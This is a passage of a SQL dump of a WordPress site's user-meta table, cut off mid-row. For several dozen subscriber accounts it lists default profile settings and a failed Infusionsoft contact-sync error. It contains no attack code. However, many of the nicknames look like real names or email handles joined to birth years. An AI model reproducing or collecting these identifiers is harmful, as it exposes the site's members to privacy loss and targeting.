(25195, 1929, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25196, 1929, 'default_password_nag', '1'),
(25197, 1930, 'nickname', 'betlind71979'),
(25198, 1930, 'first_name', ''),
(25199, 1930, 'last_name', ''),
(25200, 1930, 'description', ''),
(25201, 1930, 'rich_editing', 'true'),
(25202, 1930, 'comment_shortcuts', 'false'),
(25203, 1930, 'admin_color', 'fresh'),
(25204, 1930, 'use_ssl', '0'),
(25205, 1930, 'show_admin_bar_front', 'true'),
(25206, 1930, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25207, 1930, 'cyb_user_level', '0'),
(25208, 1930, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25209, 1930, 'default_password_nag', '1'),
(25210, 1931, 'nickname', 'patricia.fennessey2010'),
(25211, 1931, 'first_name', ''),
(25212, 1931, 'last_name', ''),
(25213, 1931, 'description', ''),
(25214, 1931, 'rich_editing', 'true'),
(25215, 1931, 'comment_shortcuts', 'false'),
(25216, 1931, 'admin_color', 'fresh'),
(25217, 1931, 'use_ssl', '0'),
(25218, 1931, 'show_admin_bar_front', 'true'),
(25219, 1931, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25220, 1931, 'cyb_user_level', '0'),
(25221, 1931, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25222, 1931, 'default_password_nag', '1'),
(25223, 1932, 'nickname', 'mnmccollum1972'),
(25224, 1932, 'first_name', ''),
(25225, 1932, 'last_name', ''),
(25226, 1932, 'description', ''),
(25227, 1932, 'rich_editing', 'true'),
(25228, 1932, 'comment_shortcuts', 'false'),
(25229, 1932, 'admin_color', 'fresh'),
(25230, 1932, 'use_ssl', '0'),
(25231, 1932, 'show_admin_bar_front', 'true'),
(25232, 1932, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25233, 1932, 'cyb_user_level', '0'),
(25234, 1932, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25235, 1932, 'default_password_nag', '1'),
(25236, 1933, 'nickname', 'bethcole992002'),
(25237, 1933, 'first_name', ''),
(25238, 1933, 'last_name', ''),
(25239, 1933, 'description', ''),
(25240, 1933, 'rich_editing', 'true'),
(25241, 1933, 'comment_shortcuts', 'false'),
(25242, 1933, 'admin_color', 'fresh'),
(25243, 1933, 'use_ssl', '0'),
(25244, 1933, 'show_admin_bar_front', 'true'),
(25245, 1933, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25246, 1933, 'cyb_user_level', '0'),
(25247, 1933, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25248, 1933, 'default_password_nag', '1'),
(25249, 1934, 'nickname', 'lgarfioc1966'),
(25250, 1934, 'first_name', ''),
(25251, 1934, 'last_name', ''),
(25252, 1934, 'description', ''),
(25253, 1934, 'rich_editing', 'true'),
(25254, 1934, 'comment_shortcuts', 'false'),
(25255, 1934, 'admin_color', 'fresh'),
(25256, 1934, 'use_ssl', '0'),
(25257, 1934, 'show_admin_bar_front', 'true'),
(25258, 1934, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25259, 1934, 'cyb_user_level', '0'),
(25260, 1934, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25261, 1934, 'default_password_nag', '1'),
(25262, 1935, 'nickname', 'wifan4ever1983'),
(25263, 1935, 'first_name', ''),
(25264, 1935, 'last_name', ''),
(25265, 1935, 'description', ''),
(25266, 1935, 'rich_editing', 'true'),
(25267, 1935, 'comment_shortcuts', 'false'),
(25268, 1935, 'admin_color', 'fresh'),
(25269, 1935, 'use_ssl', '0'),
(25270, 1935, 'show_admin_bar_front', 'true'),
(25271, 1935, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25272, 1935, 'cyb_user_level', '0'),
(25273, 1935, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25274, 1935, 'default_password_nag', '1'),
(25275, 1936, 'nickname', 'tapupo1977'),
(25276, 1936, 'first_name', ''),
(25277, 1936, 'last_name', ''),
(25278, 1936, 'description', ''),
(25279, 1936, 'rich_editing', 'true'),
(25280, 1936, 'comment_shortcuts', 'false'),
(25281, 1936, 'admin_color', 'fresh'),
(25282, 1936, 'use_ssl', '0'),
(25283, 1936, 'show_admin_bar_front', 'true'),
(25284, 1936, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25285, 1936, 'cyb_user_level', '0'),
(25286, 1936, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25287, 1936, 'default_password_nag', '1'),
(25288, 1937, 'nickname', 'barfieldrcasaierra1996'),
(25289, 1937, 'first_name', ''),
(25290, 1937, 'last_name', ''),
(25291, 1937, 'description', ''),
(25292, 1937, 'rich_editing', 'true'),
(25293, 1937, 'comment_shortcuts', 'false'),
(25294, 1937, 'admin_color', 'fresh'),
(25295, 1937, 'use_ssl', '0'),
(25296, 1937, 'show_admin_bar_front', 'true'),
(25297, 1937, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25298, 1937, 'cyb_user_level', '0'),
(25299, 1937, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25300, 1937, 'default_password_nag', '1'),
(25301, 1938, 'nickname', 'keila571981'),
(25302, 1938, 'first_name', ''),
(25303, 1938, 'last_name', ''),
(25304, 1938, 'description', ''),
(25305, 1938, 'rich_editing', 'true'),
(25306, 1938, 'comment_shortcuts', 'false'),
(25307, 1938, 'admin_color', 'fresh'),
(25308, 1938, 'use_ssl', '0'),
(25309, 1938, 'show_admin_bar_front', 'true'),
(25310, 1938, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25311, 1938, 'cyb_user_level', '0'),
(25312, 1938, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25313, 1938, 'default_password_nag', '1'),
(25314, 1939, 'nickname', 'mgombos1978'),
(25315, 1939, 'first_name', ''),
(25316, 1939, 'last_name', ''),
(25317, 1939, 'description', ''),
(25318, 1939, 'rich_editing', 'true'),
(25319, 1939, 'comment_shortcuts', 'false'),
(25320, 1939, 'admin_color', 'fresh'),
(25321, 1939, 'use_ssl', '0'),
(25322, 1939, 'show_admin_bar_front', 'true'),
(25323, 1939, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25324, 1939, 'cyb_user_level', '0'),
(25325, 1939, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25326, 1939, 'default_password_nag', '1'),
(25327, 1940, 'nickname', 'jacarfagno1983'),
(25328, 1940, 'first_name', ''),
(25329, 1940, 'last_name', ''),
(25330, 1940, 'description', ''),
(25331, 1940, 'rich_editing', 'true'),
(25332, 1940, 'comment_shortcuts', 'false'),
(25333, 1940, 'admin_color', 'fresh'),
(25334, 1940, 'use_ssl', '0'),
(25335, 1940, 'show_admin_bar_front', 'true'),
(25336, 1940, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25337, 1940, 'cyb_user_level', '0'),
(25338, 1940, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25339, 1940, 'default_password_nag', '1'),
(25340, 1941, 'nickname', 'dmclark910112004'),
(25341, 1941, 'first_name', ''),
(25342, 1941, 'last_name', ''),
(25343, 1941, 'description', ''),
(25344, 1941, 'rich_editing', 'true'),
(25345, 1941, 'comment_shortcuts', 'false'),
(25346, 1941, 'admin_color', 'fresh'),
(25347, 1941, 'use_ssl', '0'),
(25348, 1941, 'show_admin_bar_front', 'true'),
(25349, 1941, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25350, 1941, 'cyb_user_level', '0'),
(25351, 1941, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25352, 1941, 'default_password_nag', '1'),
(25353, 1942, 'nickname', 'tatyana9911994'),
(25354, 1942, 'first_name', ''),
(25355, 1942, 'last_name', ''),
(25356, 1942, 'description', ''),
(25357, 1942, 'rich_editing', 'true'),
(25358, 1942, 'comment_shortcuts', 'false'),
(25359, 1942, 'admin_color', 'fresh'),
(25360, 1942, 'use_ssl', '0'),
(25361, 1942, 'show_admin_bar_front', 'true'),
(25362, 1942, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25363, 1942, 'cyb_user_level', '0'),
(25364, 1942, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25365, 1942, 'default_password_nag', '1'),
(25366, 1943, 'nickname', 'burake2006'),
(25367, 1943, 'first_name', ''),
(25368, 1943, 'last_name', ''),
(25369, 1943, 'description', ''),
(25370, 1943, 'rich_editing', 'true'),
(25371, 1943, 'comment_shortcuts', 'false'),
(25372, 1943, 'admin_color', 'fresh'),
(25373, 1943, 'use_ssl', '0'),
(25374, 1943, 'show_admin_bar_front', 'true'),
(25375, 1943, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25376, 1943, 'cyb_user_level', '0'),
(25377, 1943, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25378, 1943, 'default_password_nag', '1'),
(25379, 1944, 'nickname', 'tomschiraldi1950'),
(25380, 1944, 'first_name', ''),
(25381, 1944, 'last_name', ''),
(25382, 1944, 'description', ''),
(25383, 1944, 'rich_editing', 'true'),
(25384, 1944, 'comment_shortcuts', 'false'),
(25385, 1944, 'admin_color', 'fresh'),
(25386, 1944, 'use_ssl', '0'),
(25387, 1944, 'show_admin_bar_front', 'true'),
(25388, 1944, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25389, 1944, 'cyb_user_level', '0'),
(25390, 1944, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25391, 1944, 'default_password_nag', '1'),
(25392, 1945, 'nickname', 'contractors1969'),
(25393, 1945, 'first_name', ''),
(25394, 1945, 'last_name', ''),
(25395, 1945, 'description', ''),
(25396, 1945, 'rich_editing', 'true'),
(25397, 1945, 'comment_shortcuts', 'false'),
(25398, 1945, 'admin_color', 'fresh'),
(25399, 1945, 'use_ssl', '0'),
(25400, 1945, 'show_admin_bar_front', 'true'),
(25401, 1945, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25402, 1945, 'cyb_user_level', '0'),
(25403, 1945, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25404, 1945, 'default_password_nag', '1'),
(25405, 1946, 'nickname', 'jamminx21964'),
(25406, 1946, 'first_name', ''),
(25407, 1946, 'last_name', ''),
(25408, 1946, 'description', ''),
(25409, 1946, 'rich_editing', 'true'),
(25410, 1946, 'comment_shortcuts', 'false'),
(25411, 1946, 'admin_color', 'fresh'),
(25412, 1946, 'use_ssl', '0'),
(25413, 1946, 'show_admin_bar_front', 'true'),
(25414, 1946, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25415, 1946, 'cyb_user_level', '0'),
(25416, 1946, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25417, 1946, 'default_password_nag', '1'),
(25418, 1947, 'nickname', 'darviecka_diaoen1990'),
(25419, 1947, 'first_name', ''),
(25420, 1947, 'last_name', ''),
(25421, 1947, 'description', ''),
(25422, 1947, 'rich_editing', 'true'),
(25423, 1947, 'comment_shortcuts', 'false'),
(25424, 1947, 'admin_color', 'fresh'),
(25425, 1947, 'use_ssl', '0'),
(25426, 1947, 'show_admin_bar_front', 'true'),
(25427, 1947, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25428, 1947, 'cyb_user_level', '0'),
(25429, 1947, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25430, 1947, 'default_password_nag', '1'),
(25431, 1948, 'nickname', 'lascap19381953'),
(25432, 1948, 'first_name', ''),
(25433, 1948, 'last_name', ''),
(25434, 1948, 'description', ''),
(25435, 1948, 'rich_editing', 'true'),
(25436, 1948, 'comment_shortcuts', 'false'),
(25437, 1948, 'admin_color', 'fresh'),
(25438, 1948, 'use_ssl', '0'),
(25439, 1948, 'show_admin_bar_front', 'true'),
(25440, 1948, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25441, 1948, 'cyb_user_level', '0'),
(25442, 1948, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25443, 1948, 'default_password_nag', '1'),
(25444, 1949, 'nickname', 'valerie.benebig1959'),
(25445, 1949, 'first_name', ''),
(25446, 1949, 'last_name', ''),
(25447, 1949, 'description', ''),
(25448, 1949, 'rich_editing', 'true'),
(25449, 1949, 'comment_shortcuts', 'false'),
(25450, 1949, 'admin_color', 'fresh'),
(25451, 1949, 'use_ssl', '0'),
(25452, 1949, 'show_admin_bar_front', 'true'),
(25453, 1949, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25454, 1949, 'cyb_user_level', '0'),
(25455, 1949, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25456, 1949, 'default_password_nag', '1'),
(25457, 1950, 'nickname', 'sharlene.dennis1993'),
(25458, 1950, 'first_name', ''),
(25459, 1950, 'last_name', ''),
(25460, 1950, 'description', ''),
(25461, 1950, 'rich_editing', 'true'),
(25462, 1950, 'comment_shortcuts', 'false'),
(25463, 1950, 'admin_color', 'fresh'),
(25464, 1950, 'use_ssl', '0'),
(25465, 1950, 'show_admin_bar_front', 'true'),
(25466, 1950, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25467, 1950, 'cyb_user_level', '0'),
(25468, 1950, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25469, 1950, 'default_password_nag', '1'),
(25470, 1951, 'nickname', 'taekwondogibson1972'),
(25471, 1951, 'first_name', ''),
(25472, 1951, 'last_name', ''),
(25473, 1951, 'description', ''),
(25474, 1951, 'rich_editing', 'true'),
(25475, 1951, 'comment_shortcuts', 'false'),
(25476, 1951, 'admin_color', 'fresh'),
(25477, 1951, 'use_ssl', '0'),
(25478, 1951, 'show_admin_bar_front', 'true'),
(25479, 1951, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25480, 1951, 'cyb_user_level', '0'),
(25481, 1951, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25482, 1951, 'default_password_nag', '1'),
(25483, 1952, 'nickname', 'jk00725p1953'),
(25484, 1952, 'first_name', ''),
(25485, 1952, 'last_name', ''),
(25486, 1952, 'description', ''),
(25487, 1952, 'rich_editing', 'true'),
(25488, 1952, 'comment_shortcuts', 'false'),
(25489, 1952, 'admin_color', 'fresh'),
(25490, 1952, 'use_ssl', '0'),
(25491, 1952, 'show_admin_bar_front', 'true'),
(25492, 1952, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25493, 1952, 'cyb_user_level', '0'),
(25494, 1952, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25495, 1952, 'default_password_nag', '1'),
(25496, 1953, 'nickname', 'biggiesjunk1954'),
(25497, 1953, 'first_name', ''),
(25498, 1953, 'last_name', ''),
(25499, 1953, 'description', ''),
(25500, 1953, 'rich_editing', 'true'),
(25501, 1953, 'comment_shortcuts', 'false'),
(25502, 1953, 'admin_color', 'fresh'),
(25503, 1953, 'use_ssl', '0'),
(25504, 1953, 'show_admin_bar_front', 'true'),
(25505, 1953, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25506, 1953, 'cyb_user_level', '0'),
(25507, 1953, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25508, 1953, 'default_password_nag', '1'),
(25509, 1954, 'nickname', 'piney63332007'),
(25510, 1954, 'first_name', ''),
(25511, 1954, 'last_name', ''),
(25512, 1954, 'description', ''),
(25513, 1954, 'rich_editing', 'true'),
(25514, 1954, 'comment_shortcuts', 'false'),
(25515, 1954, 'admin_color', 'fresh'),
(25516, 1954, 'use_ssl', '0'),
(25517, 1954, 'show_admin_bar_front', 'true'),
(25518, 1954, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25519, 1954, 'cyb_user_level', '0'),
(25520, 1954, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25521, 1954, 'default_password_nag', '1'),
(25522, 1955, 'nickname', 'rickscenter11976'),
(25523, 1955, 'first_name', ''),
(25524, 1955, 'last_name', ''),
(25525, 1955, 'description', ''),
(25526, 1955, 'rich_editing', 'true'),
(25527, 1955, 'comment_shortcuts', 'false'),
(25528, 1955, 'admin_color', 'fresh'),
(25529, 1955, 'use_ssl', '0'),
(25530, 1955, 'show_admin_bar_front', 'true'),
(25531, 1955, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25532, 1955, 'cyb_user_level', '0'),
(25533, 1955, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25534, 1955, 'default_password_nag', '1'),
(25535, 1956, 'nickname', 'lyd.port1964'),
(25536, 1956, 'first_name', ''),
(25537, 1956, 'last_name', ''),
(25538, 1956, 'description', ''),
(25539, 1956, 'rich_editing', 'true'),
(25540, 1956, 'comment_shortcuts', 'false'),
(25541, 1956, 'admin_color', 'fresh'),
(25542, 1956, 'use_ssl', '0'),
(25543, 1956, 'show_admin_bar_front', 'true'),
(25544, 1956, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25545, 1956, 'cyb_user_level', '0'),
(25546, 1956, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25547, 1956, 'default_password_nag', '1'),
(25548, 1957, 'nickname', 'erobertg2003'),
(25549, 1957, 'first_name', ''),
(25550, 1957, 'last_name', ''),
(25551, 1957, 'description', ''),
(25552, 1957, 'rich_editing', 'true'),
(25553, 1957, 'comment_shortcuts', 'false'),
(25554, 1957, 'admin_color', 'fresh'),
(25555, 1957, 'use_ssl', '0'),
(25556, 1957, 'show_admin_bar_front', 'true'),
(25557, 1957, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25558, 1957, 'cyb_user_level', '0'),
(25559, 1957, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25560, 1957, 'default_password_nag', '1'),
(25561, 1958, 'nickname', 'luke.ostheimer2008'),
(25562, 1958, 'first_name', ''),
(25563, 1958, 'last_name', ''),
(25564, 1958, 'description', ''),
(25565, 1958, 'rich_editing', 'true'),
(25566, 1958, 'comment_shortcuts', 'false'),
(25567, 1958, 'admin_color', 'fresh'),
(25568, 1958, 'use_ssl', '0'),
(25569, 1958, 'show_admin_bar_front', 'true'),
(25570, 1958, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25571, 1958, 'cyb_user_level', '0'),
(25572, 1958, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25573, 1958, 'default_password_nag', '1'),
(25574, 1959, 'nickname', 'avromio1998'),
(25575, 1959, 'first_name', ''),
(25576, 1959, 'last_name', ''),
(25577, 1959, 'description', ''),
(25578, 1959, 'rich_editing', 'true'),
(25579, 1959, 'comment_shortcuts', 'false'),
(25580, 1959, 'admin_color', 'fresh'),
(25581, 1959, 'use_ssl', '0'),
(25582, 1959, 'show_admin_bar_front', 'true'),
(25583, 1959, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25584, 1959, 'cyb_user_level', '0'),
(25585, 1959, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25586, 1959, 'default_password_nag', '1'),
(25587, 1960, 'nickname', 'harmonyanne102006'),
(25588, 1960, 'first_name', ''),
(25589, 1960, 'last_name', ''),
(25590, 1960, 'description', ''),
(25591, 1960, 'rich_editing', 'true'),
(25592, 1960, 'comment_shortcuts', 'false'),
(25593, 1960, 'admin_color', 'fresh'),
(25594, 1960, 'use_ssl', '0'),
(25595, 1960, 'show_admin_bar_front', 'true'),
(25596, 1960, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25597, 1960, 'cyb_user_level', '0'),
(25598, 1960, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25599, 1960, 'default_password_nag', '1'),
(25600, 1961, 'nickname', 'nbjork1982'),
(25601, 1961, 'first_name', ''),
(25602, 1961, 'last_name', ''),
(25603, 1961, 'description', ''),
(25604, 1961, 'rich_editing', 'true'),
(25605, 1961, 'comment_shortcuts', 'false'),
(25606, 1961, 'admin_color', 'fresh'),
(25607, 1961, 'use_ssl', '0'),
(25608, 1961, 'show_admin_bar_front', 'true'),
(25609, 1961, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25610, 1961, 'cyb_user_level', '0'),
(25611, 1961, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25612, 1961, 'default_password_nag', '1'),
(25613, 1962, 'nickname', 'stephenar1960'),
(25614, 1962, 'first_name', ''),
(25615, 1962, 'last_name', ''),
(25616, 1962, 'description', ''),
(25617, 1962, 'rich_editing', 'true'),
(25618, 1962, 'comment_shortcuts', 'false'),
(25619, 1962, 'admin_color', 'fresh'),
(25620, 1962, 'use_ssl', '0'),
(25621, 1962, 'show_admin_bar_front', 'true'),
(25622, 1962, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25623, 1962, 'cyb_user_level', '0'),
(25624, 1962, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25625, 1962, 'default_password_nag', '1'),
(25626, 1963, 'nickname', 'sparkie410541980'),
(25627, 1963, 'first_name', ''),
(25628, 1963, 'last_name', ''),
(25629, 1963, 'description', ''),
(25630, 1963, 'rich_editing', 'true'),
(25631, 1963, 'comment_shortcuts', 'false'),
(25632, 1963, 'admin_color', 'fresh'),
(25633, 1963, 'use_ssl', '0'),
(25634, 1963, 'show_admin_bar_front', 'true'),
(25635, 1963, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25636, 1963, 'cyb_user_level', '0'),
(25637, 1963, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25638, 1963, 'default_password_nag', '1'),
(25639, 1964, 'nickname', 'ashleyscott.johnson2000'),
(25640, 1964, 'first_name', ''),
(25641, 1964, 'last_name', ''),
(25642, 1964, 'description', ''),
(25643, 1964, 'rich_editing', 'true'),
(25644, 1964, 'comment_shortcuts', 'false'),
(25645, 1964, 'admin_color', 'fresh'),
(25646, 1964, 'use_ssl', '0'),
(25647, 1964, 'show_admin_bar_front', 'true'),
(25648, 1964, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25649, 1964, 'cyb_user_level', '0'),
(25650, 1964, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25651, 1964, 'default_password_nag', '1'),
(25652, 1965, 'nickname', 'lwoodgett1966'),
(25653, 1965, 'first_name', ''),
(25654, 1965, 'last_name', ''),
(25655, 1965, 'description', ''),
(25656, 1965, 'rich_editing', 'true'),
(25657, 1965, 'comment_shortcuts', 'false'),
(25658, 1965, 'admin_color', 'fresh'),
(25659, 1965, 'use_ssl', '0'),
(25660, 1965, 'show_admin_bar_front', 'true'),
(25661, 1965, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25662, 1965, 'cyb_user_level', '0'),
(25663, 1965, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25664, 1965, 'default_password_nag', '1'),
(25665, 1966, 'nickname', 'claradiangana1965'),
(25666, 1966, 'first_name', ''),
(25667, 1966, 'last_name', ''),
(25668, 1966, 'description', ''),
(25669, 1966, 'rich_editing', 'true'),
(25670, 1966, 'comment_shortcuts', 'false'),
(25671, 1966, 'admin_color', 'fresh'),
(25672, 1966, 'use_ssl', '0'),
(25673, 1966, 'show_admin_bar_front', 'true'),
(25674, 1966, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(25675, 1966, 'cyb_user_level', '0'),
(25676, 1966, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(25677, 1966, 'default_password_nag', '1'),
(25678, 1967, 'nickname', 'ascarrillo1977'),
(25679, 1967, 'first_name', ''),
(25680, 1967, 'last_name', ''),
(25681, 1967, 'description', ''),
(25682, 1967, 'rich_editing', 'true'),
(25683, 1967, 'comment_shortcuts', 'false'),
(25684, 1967, 'admin_color', 'fresh'),
(25685, 1967, 'use_ssl', '0'),
(25686, 1967, 'show_admin_bar_front', 'true'),
